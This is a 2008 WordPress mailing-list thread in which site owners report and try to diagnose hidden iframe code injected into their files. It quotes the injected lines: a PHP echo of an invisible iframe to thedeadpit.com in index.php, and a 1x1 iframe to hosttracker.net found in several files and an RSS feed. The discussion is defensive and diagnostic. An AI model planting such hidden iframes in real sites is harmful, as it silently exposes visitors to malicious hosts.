[wp-hackers] XSS vuln in wordpress 2.7 ?
mikeschinkel at gmail.com
Mon Dec 22 18:09:19 GMT 2008
I have a client I just started working with who had the same problem only
the offending line was this (and it showed up on several files, including
their RSS feed):
<iframe src="http://hosttracker.net/?click=5715531" width=1 height=1
Not sure what to make of it...
----- Original Message -----
From: "madalin" <niladam at gmail.com>
To: wp-hackers at lists.automattic.com
Sent: Monday, December 22, 2008 12:59:37 PM GMT -05:00 US/Canada Eastern
Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
Me and only one friend have access to the server.
On Mon, Dec 22, 2008 at 7:33 PM, Joost de Valk <joost at yoast.com> wrote:
> If the file is writable for the webserver and file access is enabled on
> webserver: yes.
> Joost de Valk
> joost at yoast.com
> Sent from my iPhone
> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>> Wow. That's nasty, and malicious. Could a plugin do that?
>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>> For some reason I found my blog's index.php (not theme's index.php)
>>> with the following piece of code right before the ?>
>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\"
>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>> I tried looking at the logs. No luck. The file's permissions look like
>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>>> I'm still trying to figure out how that line got there. I've
>>> downloaded wordpress right from wordpress.org, and the server is a
>>> dedicated one, only two users with shell access to it.
>>> Any suggestions ?
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com